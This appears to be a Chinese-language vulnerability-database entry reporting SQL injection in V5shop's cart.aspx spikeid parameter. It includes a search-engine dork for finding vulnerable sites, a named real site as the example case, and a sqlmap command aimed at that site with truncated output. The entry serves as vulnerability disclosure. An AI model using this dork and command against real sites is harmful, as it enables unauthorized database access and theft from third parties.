V5shop 在cart.aspx处的参数spikeid存在SQL注入漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

举例: 通过谷歌搜索inurl:productpic.aspx,因为cart.aspx是需要登录才可以正常访问,但是注入的时候毫无影响。 案例: http://www.wolifu.com/cart.aspx?act=spikebuy&spikeid=3 ![](https://images.seebug.org/contribute/ec023f85-4950-4a4e-a304-f05eabaf78dc-1.png) ``` D:\sqlmap>python sqlmap.py -u "http://www.wolifu.com/cart.aspx?act=spikebuy&spik eid=3" -p "spikeid" _ ___ ___| |_ ___ ___ {1.0-dev-nongit-20150806} |_ -| . | | | .'| . | |___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not respon sible for any misuse or damage caused by this program [*] starting at 16:09:17 [16:09:17] [INFO] testing connection to the target URL [16:09:17] [WARNING] reflective value(s) found and filtering out [16:09:17] [INFO] testing if the target URL is stable [16:09:18] [INFO] target URL is stable [16:09:19] [WARNING]...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息